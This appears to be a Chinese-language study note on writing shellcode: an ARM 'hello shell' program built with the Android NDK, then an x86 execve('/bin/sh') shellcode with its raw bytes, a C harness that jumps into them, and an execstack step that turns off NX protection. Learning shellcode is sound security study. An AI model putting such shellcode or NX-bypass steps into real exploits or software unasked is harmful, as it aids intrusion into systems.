- 使用 Windows 版 Android NDK 工具链中的 as.exe 和 ld.exe 生成可执行文件，然后导入到手机内测试
E:\task\dirtycow\androidtest>E:\andorid\android-ndk-r10e\toolchains\arm-linux-androideabi-4.8\prebuilt\windows-x86_64\arm-linux-androideabi\bin\as.exe -o .\maintest.o .\maintest.s
E:\task\dirtycow\androidtest>E:\andorid\android-ndk-r10e\toolchains\arm-linux-androideabi-4.8\prebuilt\windows-x86_64\arm-linux-androideabi\bin\ld.exe -o .\maintest .\maintest.o
http://blog.csdn.net/lwanttowin/article/details/78639763 arm 汇编编写详细 1
http://blog.csdn.net/lwanttowin/article/details/78640252 2
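.section .text          @ Linux/ARM EABI: writes "hello shell\n" to stdout, then exits
.global _start

@ Syscall numbers go in r7 on ARM EABI; args in r0-r2; `svc 0` traps.
.equ SYS_EXIT,   1      @ __NR_exit
.equ SYS_WRITE,  4      @ __NR_write
.equ STDOUT_FD,  1
.equ MSG_LEN,    12     @ strlen("hello shell\n"); must match the string at `ascii`,
                        @ otherwise write() reads past the message into the padding

_start:
    @ write(STDOUT_FD, ascii, MSG_LEN)
    mov     r2, #MSG_LEN            @ count
    adr     r1, ascii               @ buf  (PC-relative, so the binary needs no fixed load address)
    mov     r0, #STDOUT_FD          @ fd
    mov     r7, #SYS_WRITE
    svc     0

    @ exit(0): write()'s return value in r0 is discarded, status is set explicitly
    mov     r0, #0
    mov     r7, #SYS_EXIT
    svc     0

ascii:
    .string "hello shell\n"         @ .string appends a NUL; MSG_LEN deliberately excludes it
    .balign 4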
然后将生成的可执行文件导入到手机，执行。
- x86 shellcode 编写
section .text
bits 32
global _start
; Linux/i386: execve("/bin/sh", NULL, NULL) via int 0x80, written so that it
; contains no absolute address -- the jmp/call/pop sequence below recovers the
; address of the '/bin/sh' bytes from the return address that `call` pushes.
; Register roles at int 0x80: eax = syscall number, ebx = path, ecx = argv, edx = envp.
_start:
jmp short GotoCall               ; forward jump; the call below returns here-adjacent
shellcode:
pop esi                          ; esi = address of '/bin/sh' (return address pushed by call)
xor eax, eax                     ; eax = 0; also the source of the two NULL pointers below
mov ecx, eax                     ; argv = NULL
mov edx, eax                     ; envp = NULL
mov byte al, 0x0b                ; eax = 11 = __NR_execve (i386); the `byte` qualifier is redundant on an 8-bit register
mov ebx, esi                     ; filename = "/bin/sh"
int 0x80                         ; invoke the syscall
GotoCall:
call shellcode                   ; pushes the address of the bytes that follow, then jumps back
db '/bin/sh'                     ; NOTE(review): no explicit terminator is emitted after the string
编译成 x86 32 位:
~/upx_test/shellcode$ nasm -f elf oncemm.asm // 编译为 .o 文件
~/upx_test/shellcode$ ld -m elf_i386 -s -o oncemm oncemm.o // 生成 32 位的可执行文件
~/upx_test/shellcode$ objdump -d oncemm // 反汇编，查看每条指令对应的机器码
#include <stdio.h>
// Machine code of the NASM listing above (jmp / pop esi / execve via int 0x80, then '/bin/sh').
// Being an initialised global, it lives in writable .data, which is not executable on a default build.
char sc[]="\xeb\x0d\x5e\x31\xc0\x89\xc1\x89\xc2\xb0\x0b\x89\xf3\xcd\x80\xe8\xee\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
// Reinterpret the byte array as a function and jump into it.
// On a build with NX / W^X enforced this call faults instead of running the bytes;
// the `execstack -s main` step in the notes below is what makes it run.
void (*fp) (void) = (void (*)(void))sc;
// printf("--length: %u /n", strlen(shellcode));
// fp=(void *)shellcode;
fp();  // does not return if the execve succeeds; otherwise main falls through and returns 0
}
~/upx_test/shellcode$ gcc -o main main.c // 生成可执行文件 main
~/upx_test/shellcode$ sudo apt-get install execstack // 安装 execstack
~/upx_test/shellcode$ execstack -s main // 将 main 标记为可执行栈（去掉 NX 保护），否则上面的 fp() 调用会段错误
~/upx_test/shellcode$ ./main // 运行，观察效果
参考:
https://bbs.ichunqiu.com/thread-23863-1-1.html?from=beef
http://blog.csdn.net/qq_29343201/article/details/52209935